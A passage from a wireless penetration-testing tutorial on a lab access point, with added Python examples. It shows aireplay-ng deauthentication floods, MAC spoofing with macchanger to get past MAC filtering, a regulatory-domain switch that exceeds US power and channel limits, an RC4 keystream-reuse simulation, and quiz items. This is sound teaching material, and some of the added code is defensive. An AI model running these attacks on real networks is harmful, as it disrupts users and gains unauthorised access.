Role of regulatory domains in wireless


The complexities of Wi-Fi don't end here. Every country has its own unlicensed spectrum 
allocation policy. This specifically dictates allowed power levels and allowed users for the 
spectrum. In the US, for example, the FCC decides this and if you use WLANs in the US you 
have to abide by these regulations. In some countries, not doing so is a punishable offense. 


Now let us look at how we can find the default regulatory settings and then how to change 
them if required. 





Time for action — experimenting with your Alfa card 


Perform the following steps: 


1. Reboot your computer and do not connect your Alfa card to it yet. 
2. Once logged in, monitor the kernel messages using the tail command:


    root@bt:~# tail -f -n 0 /var/log/messages





3. Insert the Alfa card; you should see something resembling the following
screenshot. These are the default regulatory settings applied to your card:


    root@bt:~# tail -f -n 0 /var/log/messages
    kernel: usb 1-2: new full speed USB device using ohci_hcd and address 3
    kernel: cfg80211: Calling CRDA to update world regulatory domain
    kernel: cfg80211: World regulatory domain updated:
    kernel:     (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
    kernel:     (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, mBm)
    kernel:     (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, mBm)
    kernel:     (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, mBm)
    kernel:     (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, mBm)
    kernel:     (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, mBm)
    kernel: phy0: hwaddr 00:c0:ca:3e:bd:93, RTL8187vB (default) V1 + rtl8225z2, rfkill
    kernel: rtl8187: Customer ID is 0xFF
    kernel: rtl8187: wireless switch is on
    kernel: usbcore: registered new interface driver rtl8187
4. Let's assume that you are based in the US. To change your regulatory domain to the
US, we issue the command iw reg set US in a new terminal:


    root@bt:~# iw reg set US
    root@bt:~#





5. If the command is successful, we get an output as shown (in the following
screenshot) in the terminal where we are monitoring /var/log/messages:


    kernel: cfg80211: Calling CRDA for country: US
    kernel: cfg80211: Regulatory domain changed to country: US
    kernel:     (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
    kernel:     (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm)
    kernel:     (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm)
    kernel:     (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
    kernel:     (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
    kernel:     (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)





6. Now try changing the card to channel 11; it will work. But when you try changing
it to channel 12, you get an error. This is because channel 12 is not allowed for use in
the US:


    root@bt:~# iwconfig wlan0 channel 11
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:off/any
              Mode:Managed  Frequency:2.462 GHz  Access Point: Not-Associated
              Tx-Power=27 dBm
              Retry long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off

    root@bt:~# iwconfig wlan0 channel 12
    Error for wireless request "Set Frequency" (8B04) :
        SET failed on device wlan0 ; Invalid argument.
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:off/any
              Mode:Managed  Frequency:2.462 GHz  Access Point: Not-Associated
              Tx-Power=27 dBm
              Retry long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
    root@bt:~#
7. The same applies for power levels. The US only allows a maximum of 27 dBm (500
milliwatts), so even though the Alfa card has an advertised power of 1 Watt (30
dBm), we cannot set the card to maximum transmit power:


    root@bt:~# iwconfig wlan0 txpower 27
    root@bt:~# iwconfig wlan0 txpower 30
    Error for wireless request "Set Tx Power" (8B26) :
        SET failed on device wlan0 ; Invalid argument.
    root@bt:~#





8. However, if we were in Bolivia, then we could transmit at a power of 1 Watt, as
this is allowed there. As we can see, once we set the regulatory domain to
Bolivia with iw reg set BO, we can change the card power to 30 dBm or 1 Watt.
We can also use channel 12 in Bolivia, which was disallowed in the US:


    root@bt:~# iw reg set BO
    root@bt:~# iwconfig wlan0 txpower 30
    root@bt:~# iwconfig wlan0 channel 12
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:off/any
              Mode:Managed  Frequency:2.467 GHz  Access Point: Not-Associated
              Tx-Power=30 dBm
              Retry long limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
    root@bt:~#
Every country has its own regulations for the use of the unlicensed wireless band. When we
set our regulatory domain to a specific country, our card will obey the allowed channels and 
power levels specified. However, it is easy to change the regulatory domain of the card and 
force it to work on disallowed channels and to transmit at more than allowed power. 


Look at the various parameters you can set, such as channel, power, regulatory domain,
and so on, using the iw series of commands on BackTrack. This should give you a firm
understanding of how to configure your card when you are in different countries and need to
change your card settings.
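As an added illustration of what the kernel is doing when iwconfig refuses channel 12 or a 30 dBm transmit power, the following block (example code written for this section, not code from the book, the kernel or the aircrack-ng project) parses regulatory-rule lines in the format cfg80211 writes to the kernel log, converts channel numbers to centre frequencies and mBm to dBm, and checks whether a channel and power level fit inside a rule. The containment test is a simplified version of the kernel's own check, the sample log text is the US rule set shown in the screenshot above, and the function names are my own.

```python
"""Check a Wi-Fi channel and transmit power against cfg80211 regulatory rules.
Added example for this section, not code from the book or the Linux kernel; it
re-implements the kernel's rule-containment test in simplified form."""
import math
import re

# One rule per line, in the format cfg80211 prints to the kernel log:
# (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
RULE_RE = re.compile(
    r"\((\d+) KHz - (\d+) KHz @ (\d+) KHz\), \((\d+) mBi, (\d+) mBm\)")

# The US rule set as logged in the chapter after `iw reg set US`.
US_REGDOM_LOG = """\
kernel: cfg80211: Regulatory domain changed to country: US
kernel:     (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
kernel:     (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm)
kernel:     (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm)
kernel:     (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
kernel:     (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
kernel:     (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)
"""


def parse_reg_rules(log_text):
    """Return rules as (start_mhz, end_mhz, max_bw_mhz, max_eirp_dbm).
    mBm is a hundredth of a dBm, so 2700 mBm is the 27 dBm limit quoted in the text."""
    rules = []
    for m in RULE_RE.finditer(log_text):
        start, end, bw, _gain, eirp = (int(g) for g in m.groups())
        rules.append((start / 1000, end / 1000, bw / 1000, eirp / 100))
    return rules


def channel_to_mhz(channel):
    """Centre frequency: 2.4 GHz channels sit 5 MHz apart from 2412 MHz, channel 14
    is the odd one out at 2484 MHz, and 5 GHz channels are 5000 + 5 * n."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if 32 <= channel <= 177:
        return 5000 + 5 * channel
    raise ValueError(f"not an 802.11 channel number: {channel}")


def rule_for(rules, channel, width_mhz=20):
    """The rule whose frequency range fully contains the channel's occupied
    bandwidth (and whose bandwidth cap allows it), or None if no rule does."""
    centre = channel_to_mhz(channel)
    lo, hi = centre - width_mhz / 2, centre + width_mhz / 2
    for rule in rules:
        start, end, max_bw, _eirp = rule
        if start <= lo and hi <= end and width_mhz <= max_bw:
            return rule
    return None


def channel_allowed(rules, channel, width_mhz=20):
    return rule_for(rules, channel, width_mhz) is not None


def txpower_allowed(rules, channel, dbm, width_mhz=20):
    rule = rule_for(rules, channel, width_mhz)
    return rule is not None and dbm <= rule[3]


def dbm_to_mw(dbm):
    return 10 ** (dbm / 10)


def mw_to_dbm(mw):
    return 10 * math.log10(mw)


if __name__ == "__main__":
    us = parse_reg_rules(US_REGDOM_LOG)
    for ch in (11, 12, 36):
        print(f"channel {ch:>2} ({channel_to_mhz(ch)} MHz): allowed={channel_allowed(us, ch)}")
    for dbm in (27, 30):
        print(f"{dbm} dBm = {dbm_to_mw(dbm):.0f} mW, allowed on ch 11: {txpower_allowed(us, 11, dbm)}")
```

Channel 11 occupies 2452 to 2472 MHz and fits inside the 2402 to 2472 MHz rule; channel 12 reaches 2477 MHz and does not, which is why iwconfig returns "Invalid argument" for it. The same rule caps EIRP at 2700 mBm, so 27 dBm passes and 30 dBm fails.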









1. Which frame types are responsible for authentication in WLANs? 


a. Control 

b. Management 
c. Data 

d. QoS 


2. What is the name of the second monitor mode interface which can be created on
wlan0 using airmon-ng?


a. Mon
b. Mon1
c. 1Mon
d. Monb


3. What is the filter expression to view all non-beacon frames in Wireshark?
a. !(wlan.fc.type_subtype == 0x08)
b. wlan.fc.type_subtype == 0x08
c. (no beacon)
d. wlan.fc.type == 0x08
In this chapter, we have made some key observations about WLAN protocols:


Management, Control, and Data frames are unencrypted and thus can be easily read by 
someone who is monitoring the air space. It is important to note here that the data packet 
payload can be protected using encryption to keep it confidential. We will talk about this in 
the next chapter. 


We can sniff the entire airspace in our vicinity by putting our card into monitor mode. 


As there is no integrity protection in Management and Control frames, it is very easy to inject
these packets by modifying them or replaying them as is using tools such as aireplay-ng.


Unencrypted data packets can also be modified and replayed back to the network. If the 
packet is encrypted, we can still replay the packet as-is, as WLAN by design does not have 
packet replay protection. 


In the next chapter, we will look at different authentication mechanisms which are used in 
WLANs such as MAC Filtering, Shared Authentication, and so on, and understand the various 
security flaws in them through live demonstrations. 


"A false sense of security is worse than being unsure."

                                                   Anonymous

A false sense of security is worse than being insecure, as you may
not be prepared to face the eventuality of being hacked.


WLANs have weak authentication schemas, which can be easily broken and bypassed. In this 
chapter, we will look at the various authentication schemas used in WLANs and learn how to 
beat them. 


In this chapter, we will look at the following: 


Uncovering hidden SSIDs 
Beating MAC filters 
Bypassing Open Authentication 
Bypassing Shared Key Authentication


In the default configuration mode, all access points send out their SSIDs in the Beacon 
frames. This allows clients in the vicinity to discover them easily. 


Unfortunately, this measure does not provide robust security, but most network 
administrators think it does. We will now look at how to uncover hidden SSIDs. 






Bypassing WLAN Authentication 


Time for action — uncovering hidden SSIDs 


Follow these instructions to get started: 





1. Using Wireshark, if we monitor the Beacon frames of the Wireless Lab network,
we are able to see the SSID in plain text. You should see Beacon frames as shown in
the following screenshot:


[Screenshot: Wireshark capturing on mon0 with the filter wlan.addr == 00:21:91:d2:8e:25. The packet list shows Beacon frames from D-Link_d2:8e:25 to Broadcast (SN=2399 to SN=2412, BI=100, SSID="Wireless Lab"); the details pane shows the IEEE 802.11 wireless LAN management frame with Fixed parameters (12 bytes) and Tagged parameters (179 bytes): SSID parameter set: "Wireless Lab" (Tag Number 0, Tag length 12), Supported Rates 1.0(B) 2.0(B) 5.5(B) 11.0(B) [Mbit/sec], DS Parameter set: Current Channel 11; status bar: Packets: 526 Displayed: 274.]


2. Configure your access point to set the Wireless Lab network as a hidden SSID. The
actual configuration option to do this may differ across access points. In my case, I
need to check the Invisible option in the Visibility Status setting as shown next:


[Screenshot: the D-Link DIR-615 web interface (SETUP > WIRELESS SETTINGS, Hardware Version B2, Firmware Version 2.23). Wireless Network Name: Wireless Lab; 802.11 Mode: Mixed 802.11n, 802.11g and 802.11b; Wireless Channel: 2.462GHz - CH 11; Channel Width: 20 MHz; Visibility Status: Invisible selected instead of Visible; Security Mode: None.]


3. Now if you look at the Wireshark trace, you will find that the SSID Wireless Lab has
disappeared from the Beacon frames. This is what hidden SSIDs are all about:


[Screenshot: Wireshark capturing on mon0 after the SSID was hidden. The packet list shows Beacon frames from D-Link_d2:8e:25 to Broadcast (SN=1103 to SN=1114, BI=100) whose SSID field now reads SSID=Broadcast; the details pane shows Tagged parameters (167 bytes) with an SSID parameter set (Tag Number 0) carrying no name, Supported Rates 1.0(B) 2.0(B) 5.5(B), DS Parameter set: Current Channel 11; status bar: Packets: 1844 Displayed: 560.]


4. In order to bypass them, first we will use the passive technique of waiting for a
legitimate client to connect to the access point. This will generate Probe Request and
Probe Response packets which will contain the SSID of the network, thus revealing
its presence:


[Screenshot: Wireshark capturing on mon0, filtered on the connecting client's MAC address with wlan.addr. The packet list shows the client's Probe Request, the access point's Probe Response, Authentication, Association Request and Association Response frames, and a further Probe Request/Probe Response pair; the details pane of the Probe Response (369 bytes) shows SSID parameter set: "Wireless Lab" (Tag Number 0, Tag length 12), Supported Rates 1.0(B) 2.0(B) 5.5(B) 11.0(B), DS Parameter set: Current Channel 11, ERP Information, Extended Supported Rates, and Vendor Specific (WME, HT Capabilities) tags; status bar: Packets: 70250 Displayed: 217.]


5. Alternatively, you can use aireplay-ng to send Deauthentication packets to
all stations on behalf of the Wireless Lab access point by typing aireplay-ng
-0 5 -a 00:21:91:D2:8E:25 mon0. The -0 option is for choosing a
Deauthentication attack, and 5 is the number of Deauthentication packets to send.
Finally, -a specifies the MAC address of the access point you are targeting:


    root@bt:~# aireplay-ng -0 5 -a 00:21:91:D2:8E:25 mon0
    07:56:47  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    07:56:48  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
    07:57:19  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
    07:57:50  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
    07:58:22  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
    07:58:53  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
    root@bt:~#
6. The preceding Deauthentication packets will force all legitimate clients to disconnect 
and reconnect. It is a good idea to add a display filter for Deauthentication packets 
so that you can view them in isolation: 


[Wireshark screenshot of the live capture on mon0 with the display filter wlan.fc.type_subtype == 0x0c applied; only the Deauthentication frames sent from D-Link_d2:8e:25 to Broadcast remain in the packet list:]

    No.  Time       Source           Destination  Protocol  Info
    230  14.762645  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    231  14.762658  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    236  15.000852  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    237  15.000864  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    243  15.238118  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    245  15.238134  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    249  15.478635  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    250  15.478697  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication
    299  15.717156  D-Link_d2:8e:25  Broadcast    IEEE 802  Deauthentication

    Frame 230 (38 bytes on wire, 38 bytes captured)
    Radiotap Header v0, Length 12
    IEEE 802.11 Deauthentication, Flags: ........
        Type/Subtype: Deauthentication (0x0c)
        Frame Control: 0x00C0 (Normal)
        Duration: 314
        Destination address: Broadcast (ff:ff:ff:ff:ff:ff)
        Source address: D-Link_d2:8e:25 (00:21:91:d2:8e:25)
        BSS Id: D-Link_d2:8e:25 (00:21:91:d2:8e:25)
        Fragment number: 0
        Sequence number: 0
    IEEE 802.11 wireless LAN management frame

    0000  00 00 0c 00 04 80 00 00 02 00 18 00 c0 00 3a 01
    0010  ff ff ff ff ff ff 00 21 91 d2 8e 25 00 21 91 d2
    0020  8e 25 00 00 07 00





7. The Probe Responses from the access point will end up revealing its hidden SSID. 
These packets will show up in Wireshark as shown next. Once the legitimate clients 
connect back, we can see the hidden SSID in the Probe Request and Probe 
Response frames. You could use the filter (wlan.bssid == 00:21:91:d2:8e:25) && 
!(wlan.fc.type_subtype == 0x08) to monitor all non-Beacon packets to and from 
the access point. The && sign stands for the logical AND operator and the ! sign 
stands for the logical NOT operator: 


[Wireshark screenshot with the filter (wlan.bssid == 00:21:91:d2:8e:25) && !(wlan.fc.type_subtype == 0x08) applied. The packet list shows the client 60:fb:42:d5:e4:01 re-joining D-Link_d2:8e:25: a Probe Response (SN=3545, BI=100, SSID="Wireless Lab"), Authentication frames (SN=2114, SN=3548), an Association Request (SN=2115, SSID="Wireless Lab") and Association Response (SN=3549), a Probe Request (SN=2116, SSID="Wireless Lab") and a Probe Response (SN=3551, BI=100, SSID="Wireless Lab"). Frame 544, a Probe Response, is expanded:]

    Frame 544 (369 bytes on wire, 369 bytes captured)
    Radiotap Header v0, Length 32
    IEEE 802.11 Probe Response, Flags: ........C
    IEEE 802.11 wireless LAN management frame
        Fixed parameters (12 bytes)
        Tagged parameters
            SSID parameter set: "Wireless Lab"
                Tag Number: 0 (SSID parameter set)
                Tag length: 12
                Tag interpretation: Wireless Lab
            Supported Rates: 1.0(B) 2.0(B) 5.5(B) 11.0(B)
            DS Parameter set: Current Channel: 11
            ERP Information: no Non-ERP STAs, do not use protection, short or long preambles
            Extended Supported Rates: 6.0 9.0 12.0 18.0 24.0 36.0 48.0 54.0
            Vendor Specific: WME
            Vendor Specific: HT Capabilities (802.11n D1.10)
Even though the SSID is hidden and not broadcast, whenever a legitimate client tries to 
connect to the access point, they exchange Probe Request and Probe Response packets. 
These packets contain the SSID of the access point. As these packets are not encrypted, they 
can be very easily sniffed from the air and the SSID can be found. 





In many cases, all clients may already be connected to the access point and there may be 
no Probe Request/Response packets available in the Wireshark trace. Here, we can forcibly 
disconnect the clients from the access point by sending forged Deauthentication packets 
over the air. These packets will force the clients to reconnect to the access point, thus 
revealing the SSID. 
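As an added example (not code from the book), here is a small Python parser for the radiotap-encapsulated Deauthentication frame shown in the Wireshark hex pane above, together with the rate-based check a wireless IDS would run over such a capture to flag a Deauthentication flood like the one aireplay-ng just produced. The frame bytes and the timestamps are taken from the screenshot; the second access point, the window and the threshold are constructed values.

```python
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0          # 802.11 frame type: management
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C  # Type/Subtype: Deauthentication (0x0c)
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample input: the 38 bytes of frame 230 as the Wireshark hex pane shows them
# (12-byte radiotap header, then the broadcast Deauthentication from the lab access point).
FRAME_230 = bytes.fromhex(
    "00000c000480000002001800c0003a01"
    "ffffffffffff002191d28e25002191d2"
    "8e2500000700"
)
# Constructed: one unicast Deauthentication from an unrelated, locally administered BSSID,
# so the detector can be seen ignoring low-rate traffic.
OTHER_AP_FRAME = bytes.fromhex(
    "00000c000480000002001800c0003a01"
    "0200000000aa020000000001"
    "0200000000010000"
    "0700"
)
# Constructed trace: the Time column of frames 230..299 from the screenshot, plus the extra frame.
DEAUTH_TIMES = [14.762645, 14.762658, 15.000852, 15.000864, 15.238118,
                15.238134, 15.478635, 15.478697, 15.717156]
SAMPLE_TRACE = sorted([(t, FRAME_230) for t in DEAUTH_TIMES] + [(15.1, OTHER_AP_FRAME)])


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(raw: bytes) -> dict:
    """Parse the radiotap header and 802.11 MAC header of a monitor-mode frame.

    Returns type/subtype, the three addresses, the sequence number and, for
    Deauthentication/Disassociation frames, the reason code from the body.
    """
    if len(raw) < 4 or raw[0] != 0:
        raise ValueError("not a radiotap v0 frame")
    rt_len = struct.unpack_from("<H", raw, 2)[0]   # radiotap length, little-endian
    hdr = raw[rt_len:rt_len + 24]                   # 24-byte management frame header
    if len(hdr) < 24:
        raise ValueError("truncated 802.11 header")
    fc0, fc1, duration = struct.unpack_from("<BBH", hdr, 0)
    frame = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": fc0 >> 4,
        "protected": bool(fc1 & 0x40),
        "duration": duration,
        "dst": fmt_mac(hdr[4:10]),     # addr1
        "src": fmt_mac(hdr[10:16]),    # addr2
        "bssid": fmt_mac(hdr[16:22]),  # addr3 carries the BSSID in management frames
        "seq": struct.unpack_from("<H", hdr, 22)[0] >> 4,
        "reason": None,
    }
    body = raw[rt_len + 24:]
    if (frame["type"] == TYPE_MGMT
            and frame["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
            and len(body) >= 2):
        frame["reason"] = struct.unpack_from("<H", body, 0)[0]
    return frame


def detect_deauth_flood(trace, window=1.0, threshold=5):
    """Flag a BSSID that emits `threshold` Deauth/Disassoc frames within `window` seconds.

    `trace` is an iterable of (timestamp_seconds, raw_frame_bytes). Returns a list of
    (bssid, timestamp, count) alerts, one each time the threshold is reached.
    """
    recent = defaultdict(deque)
    alerts = []
    for ts, raw in trace:
        f = parse_frame(raw)
        if f["type"] != TYPE_MGMT or f["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[f["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:   # drop frames that fell out of the window
            q.popleft()
        if len(q) == threshold:
            alerts.append((f["bssid"], ts, len(q)))
    return alerts


if __name__ == "__main__":
    print(parse_frame(FRAME_230))
    print(detect_deauth_flood(SAMPLE_TRACE))
```

A real AP also sends the occasional Deauthentication (reason code 7, "class 3 frame from non-associated station", is a common one), which is why the check is on rate per BSSID rather than on the mere presence of the frame.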


Have a go hero — selecting Deauthentication 


In the previous exercise, we sent broadcast Deauthentication packets to force reconnection 
of all wireless clients. Try and check how you can selectively target individual clients using 
aireplay-ng. 


It is important to note that even though we are illustrating many of these concepts using 
Wireshark, it is possible to orchestrate these attacks with other tools such as the aircrack-ng 
suite as well. We encourage you to explore the entire aircrack-ng suite of tools and 
the other documentation located on their website: http://www.aircrack-ng.org. 
MAC filters are an age-old technique used for authentication and authorization and have 
their roots in the wired world. Unfortunately, they fail miserably in the wireless world. 


The basic idea is to authenticate based on the MAC address of the client. The list of allowed 
MAC addresses is maintained by the network administrator and fed into the 
access point. We will now look at how easy it is to bypass MAC filters. 


Time for action — beating MAC filters 


Let the games begin: 





1. Let us first configure our access point to use MAC filtering and then add the client 
MAC address of the victim laptop. The settings pages on my router look as follows: 


[Screenshot of the D-Link DIR-615 (Hardware Version B2, Firmware Version 2.23) ADVANCED > NETWORK FILTER page. MAC Filtering is set to "Turn MAC Filtering ON and ALLOW computers listed to access the network", and the MAC FILTERING RULES list contains the addresses 00:22:19:e9:41:ac and 60:fb:42:d5:e4:01.]
2. Once MAC filtering is enabled, only the allowed MAC addresses will be able to 
successfully authenticate with the access point. If we try to connect to the access 
point from a machine with a non-whitelisted MAC address, the connection will fail 
as shown next: 


[Screenshot of the output of iwconfig wlan0 essid "Wireless Lab" channel 11 followed by iwconfig: the non-wireless interfaces report "no wireless extensions"; wlan0 is in Managed mode on 2.462 GHz with ESSID "Wireless Lab" but shows no link to the access point (Link Quality:0 Signal level:0 Noise level:0); mon0 remains in Monitor mode on 2.462 GHz.]





3. Behind the scenes, the access point is sending Authentication failure messages to 
the client. The packet trace would resemble the following: 


[Wireshark screenshot of the capture on mon0: the whitelisted client 60:fb:42:d5:e4:01 exchanging QoS Null function frames with D-Link_d2:8e:25, followed by a Probe Response and Authentication frames between D-Link_d2:8e:25 and Alfa_3e:bd:93 (our non-whitelisted card). Frame 1404 is expanded:]

    Frame 1404 (66 bytes on wire, 66 bytes captured)
    Radiotap Header v0, Length 32
    IEEE 802.11 Authentication, Flags: ........C
    IEEE 802.11 wireless LAN management frame
        Fixed parameters (6 bytes)
            Authentication Algorithm: Open System (0)
            Authentication SEQ: 0x0002
            Status code: Unspecified failure
4. In order to beat MAC filters, we can use airodump-ng to find the MAC addresses 
of clients connected to the access point. We can do this by issuing the command 
airodump-ng -c 11 -a --bssid 00:21:91:D2:8E:25 mon0. By specifying 
the bssid, we will only monitor the access point which is of interest to us. The -c 
11 sets the channel to 11, where the access point is. The -a ensures that in the client 
section of the airodump-ng output, only clients associated and connected to an 
access point are shown. This will show us all the client MAC addresses associated 
with the access point: 


    CH 11 ][ Elapsed: 20 s ][ 2011-01-09 09:15

    BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    00:21:91:D2:8E:25  -15  90      193     16    0  11  54e. OPN              Wireless Lab

    BSSID              STATION            PWR  Rate  Lost  Packets  Probes
    00:21:91:D2:8E:25  60:FB:42:D5:E4:01   -3           0        3  Wireless Lab





5. Once we find a whitelisted client's MAC address, we can spoof the MAC address of 
the client using the macchanger utility which ships with BackTrack. You can use the 
command macchanger -m 60:FB:42:D5:E4:01 wlan0 to get this done. The 
MAC address you specify with the -m option is the new spoofed MAC address for 
the wlan0 interface: 


    root@bt:~# ifconfig wlan0 down
    root@bt:~# macchanger -m 60:FB:42:D5:E4:01 wlan0
    Current MAC: 00:c0:ca:3e:bd:93 (Alfa, Inc.)
    Faked MAC:   60:fb:42:d5:e4:01 (unknown)
    root@bt:~# ifconfig wlan0 up
    root@bt:~#
    root@bt:~# iwconfig wlan0 essid "Wireless Lab" channel 11
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:"Wireless Lab"
              Mode:Managed  Frequency:2.462 GHz  Access Point: 00:21:91:D2:8E:25
              Bit Rate=1 Mb/s   Tx-Power=27 dBm
              Retry min limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=70/70  Signal level=-15 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

    root@bt:~#
6. As you can clearly see, we are now able to connect to the access point after spoofing 
the MAC address of a whitelisted client. 








We monitored the air using airodump-ng and found the MAC address of a legitimate client 
connected to the wireless network. We then used the macchanger utility to change our 
wireless card's MAC address to match the client's. This fooled the access point into believing 
that we are the legitimate client, and it allowed us access to its wireless network. 





You are encouraged to explore the different options of the airodump-ng utility by going 
through the documentation on their website: http://www.aircrack-ng.org/doku.php?id=airodump-ng. 
The term Open Authentication is almost a misnomer, as it actually provides no 
authentication at all. When an access point is configured to use Open Authentication, it will 
successfully authenticate all clients which connect to it. 


We will now do an exercise to authenticate and connect to an access point using Open 
Authentication. 


Time for action — bypassing Open Authentication 


Let us now look at how to bypass Open Authentication: 





1. We will first set our lab access point Wireless Lab to use Open Authentication. On 
my access point this is simply done by setting Security Mode to None: 


[Screenshot of the DIR-615 (Hardware Version B2, Firmware Version 2.23) SETUP > WIRELESS SETTINGS page: Wireless Network Name "Wireless Lab" (also called the SSID), 802.11 Mode "Mixed 802.11n, 802.11g and 802.11b", Wireless Channel 2.462 GHz - CH 11, Transmission Rate Best (automatic), Channel Width 20 MHz, Visibility Status Visible, and under WIRELESS SECURITY MODE, Security Mode: None.]
2. We then connect to this access point using the command iwconfig wlan0 essid 
"Wireless Lab" and verify that the connection has succeeded and that we are 
connected to the access point: 

    root@bt:~# iwconfig wlan0 essid "Wireless Lab"
    root@bt:~# iwconfig wlan0
    wlan0     IEEE 802.11bg  ESSID:"Wireless Lab"
              Mode:Managed  Frequency:2.462 GHz  Access Point: 00:21:91:D2:8E:25
              Bit Rate=1 Mb/s   Tx-Power=27 dBm
              Retry min limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality=70/70  Signal level=-15 dBm
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0

    root@bt:~#
    root@bt:~#

3. Note that we did not have to supply any username / password / passphrase to get 
through Open Authentication. 

Bypassing WLAN Authentication 
This is probably the simplest hack so far. As you saw, it was trivial to break Open 
Authentication and connect to the access point. 
Shared Key Authentication uses a shared secret such as the WEP key to authenticate the 
client. The exact exchange of information is illustrated next (taken from http://www.netgear.com): 

    Client                                      Access Point
      |  ---- 1) Authentication Request ---->       |
      |  <--- 2) AP sends Challenge Text ----       |
      |  ---- 3) Challenge Response -------->       |


The wireless client sends an authentication request to the access point, which responds 
with a challenge. The client now needs to encrypt this challenge with the shared 
key and send it back to the access point, which decrypts it to check whether it can recover the 
original challenge text. If it succeeds, the client is successfully authenticated; otherwise the 
access point sends an authentication failed message. 


The security problem here is that an attacker passively listening to this entire exchange 
by sniffing the air has access to both the plaintext challenge and the encrypted challenge. 
XORing the two yields the keystream. This keystream can be used to encrypt 
any future challenge sent by the access point without needing to know the actual key. 


In this exercise, we will learn how to sniff the air to retrieve the challenge and the encrypted 
challenge, retrieve the keystream, and use it to authenticate to the access point without 
needing the shared key. 
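The exchange and the keystream-reuse flaw described above, simulated end to end in Python as an added example that is not part of the book. The RC4 routine, the access-point and client roles, and the random 40-bit key are all constructed here; the frame layout follows the Wireshark decode (algorithm 1, sequence numbers 1 to 4, challenge tag 16 of 128 bytes), so the recovered keystream is 6 + 2 + 128 + 4 = 140 bytes.

```python
import os
import struct
import zlib

SHARED_KEY_ALG = 1   # Authentication Algorithm: Shared key (1)
CHALLENGE_TAG = 16   # Tag Number: 16 (Challenge text)
CHALLENGE_LEN = 128  # Tag Length: 128


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (WEP's stream cipher): key scheduling, then keystream XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def auth_body(seq: int, challenge: bytes) -> bytes:
    """Authentication frame body: fixed parameters (algorithm, SEQ, status) + challenge-text IE."""
    fixed = struct.pack("<HHH", SHARED_KEY_ALG, seq, 0)
    return fixed + bytes([CHALLENGE_TAG, len(challenge)]) + challenge


def challenge_from_body(body: bytes) -> bytes:
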